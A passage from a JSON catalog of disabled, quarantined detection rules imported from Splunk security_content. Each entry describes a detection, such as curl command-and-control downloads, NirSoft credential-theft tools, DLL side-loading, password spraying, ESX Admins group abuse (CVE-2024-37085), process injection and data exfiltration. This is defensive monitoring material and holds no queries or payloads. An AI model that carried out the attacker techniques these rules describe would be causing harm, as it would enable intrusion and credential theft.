If confirmed malicious, this could indicate delivery of malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-malware-file-downloaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3cc93f52-5aa6-4b7f-83b9-3430b1436813", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___malware_file_downloaded.yml" } }, { "id": "splunk-security-content-3cf0dc36-484d-11ec-a6bc-acde48001122", "type": "detection", "name": "Suspicious Process DNS Query Known Abuse Web Services", "description": "The following analytic detects a suspicious process making DNS queries to known, abused text-paste web services, VoIP, instant messaging, and digital distribution platforms. It leverages Sysmon EventID 22 logs to identify queries from processes like cmd.exe, powershell.exe, and others. This activity is significant as it may indicate an attempt to download malicious files, a common initial access technique. 
If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further compromise of the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-process-dns-query-known-abuse-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3cf0dc36-484d-11ec-a6bc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/suspicious_process_dns_query_known_abuse_web_services.yml" } }, { "id": "splunk-security-content-3cf85c02-f9d6-4186-bf3c-e70ee99fbc7f", "type": "detection", "name": "Windows Unsigned DLL Side-Loading In Same Process Path", "description": "This detection identifies unsigned DLLs loaded through DLL side-loading from the same file path as the process that loaded the DLL, a technique observed in DarkGate malware. This detection monitors DLL loading, verifies signatures, and flags unsigned DLLs. Suspicious file paths and known executable associations are checked. Detecting such suspicious DLLs is crucial in preventing privilege escalation attacks and other potential security breaches. 
Regular security assessments, thorough monitoring, and implementing security best practices are essential in safeguarding systems from such threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unsigned-dll-side-loading-in-same-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3cf85c02-f9d6-4186-bf3c-e70ee99fbc7f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unsigned_dll_side_loading_in_same_process_path.yml" } }, { "id": "splunk-security-content-3d6b1a81-367b-42d5-a925-6ef90b6b9f1e", "type": "detection", "name": "Kubernetes Pod Created in Default Namespace", "description": "The following analytic detects the creation of Kubernetes pods in the default, kube-system, or kube-public namespaces. It leverages Kubernetes audit logs to identify pod creation events within these specific namespaces. This activity is significant for a SOC as it may indicate an attacker attempting to hide their presence or evade defenses. 
Unauthorized pod creation in these namespaces can suggest a successful cluster breach, potentially leading to privilege escalation, persistent access, or further malicious activities within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-pod-created-in-default-namespace.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d6b1a81-367b-42d5-a925-6ef90b6b9f1e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_pod_created_in_default_namespace.yml" } }, { "id": "splunk-security-content-3d7df60b-3332-4667-8090-afe03e08dce0", "type": "detection", "name": "Windows ESX Admins Group Creation via Net", "description": "This analytic detects attempts to create an \"ESX Admins\" group using the Windows net.exe or net1.exe commands. This activity may indicate an attempt to exploit the VMware ESXi Active Directory Integration Authentication Bypass vulnerability (CVE-2024-37085). 
Attackers can use this method to gain unauthorized access to ESXi hosts by recreating the \"ESX Admins\" group after its deletion from Active Directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.002", "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-esx-admins-group-creation-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d7df60b-3332-4667-8090-afe03e08dce0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_esx_admins_group_creation_via_net.yml" } }, { "id": "splunk-security-content-3d8536b6-52b4-4c3e-b695-3f2e90bb22be", "type": "detection", "name": "Cisco Secure Firewall - Potential Data Exfiltration", "description": "The following analytic detects potentially suspicious large volumes of data sent by the connection initiator on flows from internal to external networks. It leverages Cisco Secure Firewall Threat Defense ConnectionEvent logs and thresholds on InitiatorBytes (bytes transmitted by the initiator), which for typical inside-initiated client sessions approximates upload or outbound payload from the internal host and avoids flagging large downloads where most bytes appear in ResponderBytes. Connections where the initiator sent at least 100 MB are flagged, as these may indicate unauthorized data exfiltration, especially if associated with unusual users, hosts, or processes. 
This analytic is scoped to inside-to-outside flows using a macro (cisco_secure_firewall_inside_to_outside) to abstract environment-specific zone definitions. If confirmed malicious, this behavior may reflect data staging and exfiltration over an encrypted or stealthy transport.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1567.002", "T1048.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-potential-data-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d8536b6-52b4-4c3e-b695-3f2e90bb22be", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___potential_data_exfiltration.yml" } }, { "id": "splunk-security-content-3d8d201c-aa03-422d-b0ee-2e5ecf9718c0", "type": "detection", "name": "Detection of tools built by NirSoft", "description": "The following analytic identifies the execution of tools built by NirSoft by detecting specific command-line arguments such as \"/stext\" and \"/scomma\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because NirSoft tools, while legitimate, can be exploited by attackers for malicious purposes such as credential theft or system reconnaissance. 
If confirmed malicious, this activity could lead to unauthorized access, data exfiltration, or further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detection-of-tools-built-by-nirsoft.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d8d201c-aa03-422d-b0ee-2e5ecf9718c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detection_of_tools_built_by_nirsoft.yml" } }, { "id": "splunk-security-content-3d8d3a36-93b8-42d7-8d91-c5f24cec223d", "type": "detection", "name": "Azure AD Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies a single source IP failing to authenticate with multiple valid users, potentially indicating a Password Spraying attack against an Azure Active Directory tenant. It uses Azure SignInLogs data and calculates the standard deviation for source IPs, applying the 3-sigma rule to detect unusual numbers of failed authentication attempts. This activity is significant as it may signal an adversary attempting to gain initial access or elevate privileges. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-unusual-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3d8d3a36-93b8-42d7-8d91-c5f24cec223d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_unusual_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-3df0e9a8-7d5e-4b2f-bcd7-bf93e671d1f2", "type": "detection", "name": "Cisco Isovalent - Kprobe Spike", "description": "This analytic detects excessive kernel probe (kprobe) events in a Kubernetes cluster over a short period of time.\nKprobes are a Linux kernel debugging and instrumentation mechanism that allows dynamic monitoring and tracing of kernel functions and system calls.\nIn containerized or cloud-native environments, kprobes are occasionally used for legitimate low-level diagnostics; however, monitoring a spike in kprobe activity is important because malware or attackers may abuse this mechanism to gain insights into the kernel, attempt privilege escalation, or tamper with host processes.\nMore than 10 kprobe events within 5 minutes may indicate suspicious activity, such as an attacker probing the kernel through repeated system calls (e.g., nsenter, mount, sethostname).\nSuch abnormal volume and 
frequency of kprobe usage within application pods or on nodes can signal container escape attempts or low-level tampering with the host, thereby representing a potential security threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-kprobe-spike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3df0e9a8-7d5e-4b2f-bcd7-bf93e671d1f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___kprobe_spike.yml" } }, { "id": "splunk-security-content-3e1f1568-9633-11eb-a69c-acde48001122", "type": "detection", "name": "AWS IAM AccessDenied Discovery Events", "description": "The following analytic identifies excessive AccessDenied events within an hour timeframe for IAM users in AWS. It leverages AWS CloudTrail logs to detect multiple failed access attempts from the same source IP and user identity. This activity is significant as it may indicate that an access key has been compromised and is being misused for unauthorized discovery actions. 
If confirmed malicious, this could allow attackers to gather information about the AWS environment, potentially leading to further exploitation or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-accessdenied-discovery-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3e1f1568-9633-11eb-a69c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_accessdenied_discovery_events.yml" } }, { "id": "splunk-security-content-3e27af56-fcf0-4113-988d-24969b062be7", "type": "detection", "name": "Windows Executable in Loaded Modules", "description": "The following analytic identifies instances where executable files (.exe) are loaded as modules, detected through 'ImageLoaded' events in Sysmon logs. This method leverages Sysmon EventCode 7 to track unusual module loading behavior, which is significant as it deviates from the norm of loading .dll files. This activity is crucial for SOC monitoring because it can indicate the presence of malware like NjRAT, which uses this technique to load malicious modules. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, maintain persistence, and further compromise the host system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1129" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-executable-in-loaded-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3e27af56-fcf0-4113-988d-24969b062be7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_executable_in_loaded_modules.yml" } }, { "id": "splunk-security-content-3e8f9c2a-6d4b-4a7e-9c5f-1b8d7e3a9f2c", "type": "detection", "name": "Cisco ASA - User Account Lockout Threshold Exceeded", "description": "This analytic detects user account lockouts on Cisco ASA devices resulting from excessive failed authentication attempts.\nAccount lockouts may indicate brute force attacks, password spraying campaigns, credential stuffing attempts using compromised credentials from external breaches, or misconfigured automation attempting authentication with incorrect credentials. 
These activities represent attempts to gain unauthorized access to network infrastructure.\nThe detection monitors for ASA message ID 113006, which is generated when a user account is locked out after exceeding the configured maximum number of failed authentication attempts, capturing the locked account name and the failure threshold that was exceeded.\nInvestigate account lockouts for privileged or administrative accounts, multiple simultaneous lockouts affecting different accounts (suggesting password spraying), lockouts originating from unusual source IP addresses, lockouts during off-hours, or patterns suggesting automated attack tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-user-account-lockout-threshold-exceeded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3e8f9c2a-6d4b-4a7e-9c5f-1b8d7e3a9f2c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___user_account_lockout_threshold_exceeded.yml" } }, { "id": "splunk-security-content-3ec347e3-a94a-4a8b-a918-8306ea403182", "type": "detection", "name": "Windows Outlook Macro Created by Suspicious Process", "description": "The following analytic detects the creation of an Outlook Macro (VbaProject.OTM) by a suspicious process. This file is normally created when you create a macro from within Outlook. If this file is created by a process other than Outlook.exe it may be maliciously created. 
This detection leverages data from the Filesystem datamodel, specifically looking for the file creation event for VbaProject.OTM. This activity is significant as it is commonly associated with some malware infections, indicating potential malicious intent to harvest email information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-macro-created-by-suspicious-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3ec347e3-a94a-4a8b-a918-8306ea403182", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_macro_created_by_suspicious_process.yml" } }, { "id": "splunk-security-content-3ed0d6ba-4791-4fa8-a1ef-403e438c7033", "type": "detection", "name": "GitHub Organizations Disable 2FA Requirement", "description": "The following analytic detects when two-factor authentication (2FA) requirements are disabled in GitHub Organizations. The detection monitors GitHub Organizations audit logs for 2FA requirement changes by tracking actor details, organization information, and associated metadata. For a SOC, identifying disabled 2FA requirements is critical as it could indicate attempts to weaken account security controls. Two-factor authentication is a fundamental security control that helps prevent unauthorized access even if passwords are compromised. Disabling 2FA requirements could allow attackers to more easily compromise accounts through password-based attacks. 
The impact of disabled 2FA includes increased risk of account takeover, potential access to sensitive code and intellectual property, and compromise of the software supply chain. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting broader account compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-disable-2fa-requirement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3ed0d6ba-4791-4fa8-a1ef-403e438c7033", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_disable_2fa_requirement.yml" } }, { "id": "splunk-security-content-3f0647ce-add5-4436-8039-cbd1abe74563", "type": "detection", "name": "Azure AD Service Principal Enumeration", "description": "This detection leverages azure graph activity logs to identify when graph APIs have been used to identify 10 or more service principals. 
This type of behaviour is associated with Azure enumeration tools such as AzureHound or ROADtools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004", "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f0647ce-add5-4436-8039-cbd1abe74563", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_enumeration.yml" } }, { "id": "splunk-security-content-3f0b95e3-3195-46ac-bea3-84fb59e7fac5", "type": "detection", "name": "Potential System Network Configuration Discovery Activity", "description": "The following analytic identifies the rapid execution of processes used for system network configuration discovery on an endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUIDs, names, parent processes, and command-line executions. This activity can be significant as it may indicate an attacker attempting to map the network, which is a common precursor to lateral movement or further exploitation. 
If confirmed malicious, this behavior could allow an attacker to gain insights into the network topology, identify critical systems, and plan subsequent attacks, potentially leading to data exfiltration or system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/potential-system-network-configuration-discovery-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f0b95e3-3195-46ac-bea3-84fb59e7fac5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/potential_system_network_configuration_discovery_activity.yml" } }, { "id": "splunk-security-content-3f1a2b4c-d5e6-7890-abcd-ef1234567890", "type": "detection", "name": "PowerShell PInvoke Process Injection API Chain", "description": "The following analytic detects PowerShell Script Block Logging (Event ID 4104) evidence of a complete P/Invoke process-injection API chain at either the compile phase or the execution phase.\nPortions of this search were modified to retain the same functionality while preventing antivirus products from alerting on the detection itself.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001", "T1055.003", "T1055.004", "T1055.012", "T1055.013", "T1059.001", "T1620" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/powershell-pinvoke-process-injection-api-chain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f1a2b4c-d5e6-7890-abcd-ef1234567890", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_pinvoke_process_injection_api_chain.yml" } }, { "id": "splunk-security-content-3f28c930-5208-425d-a7b9-53d349756d91", "type": "detection", "name": "Ollama Possible RCE via Model Loading", "description": "Detects Ollama server errors and failures during model loading operations that may indicate malicious model injection, path traversal attempts, or exploitation of model loading mechanisms to achieve remote code execution. Adversaries may attempt to load specially crafted malicious models or exploit vulnerabilities in the model loading process to execute arbitrary code on the server. 
This detection monitors error messages and failure patterns that could signal attempts to abuse model loading functionality for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-possible-rce-via-model-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f28c930-5208-425d-a7b9-53d349756d91", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_possible_rce_via_model_loading.yml" } }, { "id": "splunk-security-content-3f519894-4276-11ec-ab02-3e22fbd008af", "type": "detection", "name": "Windows Service Initiation on Remote Endpoint", "description": "The following analytic detects the execution of `sc.exe` with command-line arguments used to start a Windows Service on a remote endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because adversaries may exploit the Service Control Manager for lateral movement and remote code execution. 
If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-initiation-on-remote-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f519894-4276-11ec-ab02-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_initiation_on_remote_endpoint.yml" } }, { "id": "splunk-security-content-3f613dc0-21f2-4063-93b1-5d3c15eef22f", "type": "detection", "name": "Suspicious Curl Network Connection", "description": "The following analytic detects the use of the curl command contacting suspicious remote domains, such as s3.amazonaws.com, which is indicative of Command and Control (C2) activity or downloading further implants. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it may indicate the presence of MacOS adware or other malicious software attempting to establish persistence or exfiltrate data. 
If confirmed malicious, this could allow attackers to maintain control over the compromised system and deploy additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-curl-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f613dc0-21f2-4063-93b1-5d3c15eef22f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_curl_network_connection.yml" } }, { "id": "splunk-security-content-3f6bbf22-093e-4cb4-9641-83f47b8444b6", "type": "detection", "name": "Elevated Group Discovery With Wmic", "description": "The following analytic detects the execution of `wmic.exe` with command-line arguments querying specific elevated domain groups. It leverages Endpoint Detection and Response (EDR) telemetry to identify processes that access the LDAP namespace and search for groups like \"Domain Admins\" or \"Enterprise Admins.\" This activity is significant as it indicates potential reconnaissance efforts by adversaries to identify high-privilege accounts within Active Directory. 
If confirmed malicious, this behavior could lead to privilege escalation, allowing attackers to gain elevated access and control over critical network resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/elevated-group-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3f6bbf22-093e-4cb4-9641-83f47b8444b6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/elevated_group_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-3fb2e8e3-7bc0-4567-9722-c5ab9f8595eb", "type": "detection", "name": "Windows Create Local Account", "description": "The following analytic detects the creation of a new local user account on a Windows system. It leverages Windows Security Audit logs, specifically event ID 4720, to identify this activity. Monitoring the creation of local accounts is crucial for a SOC as it can indicate unauthorized access or lateral movement within the network. 
If confirmed malicious, this activity could allow an attacker to establish persistence, escalate privileges, or gain unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-create-local-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3fb2e8e3-7bc0-4567-9722-c5ab9f8595eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_create_local_account.yml" } }, { "id": "splunk-security-content-3fc16961-97e5-4a5b-a079-e4ab0d9763eb", "type": "detection", "name": "Windows PowerShell Add Module to Global Assembly Cache", "description": "The following analytic detects the addition of a DLL to the Windows Global Assembly Cache (GAC) using PowerShell. It leverages PowerShell Script Block Logging to identify commands containing \"system.enterpriseservices.internal.publish\". This activity is significant because adding a DLL to the GAC allows it to be shared across multiple applications, potentially enabling an adversary to execute malicious code system-wide. 
If confirmed malicious, this could lead to widespread code execution, privilege escalation, and persistent access across the operating system, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-add-module-to-global-assembly-cache.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3fc16961-97e5-4a5b-a079-e4ab0d9763eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_add_module_to_global_assembly_cache.yml" } }, { "id": "splunk-security-content-4006adac-5937-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious MSBuild Rename", "description": "The following analytic detects the execution of renamed instances of msbuild.exe. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names within the Endpoint data model. This activity is significant because msbuild.exe is a legitimate tool often abused by attackers to execute malicious code while evading detection. 
